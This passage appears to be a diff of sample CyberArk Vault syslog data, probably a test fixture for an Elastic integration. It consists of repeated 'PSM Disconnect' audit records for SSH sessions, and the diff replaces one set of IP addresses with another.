Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n 
VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM 
Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:34:50Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n 
Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM 
Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
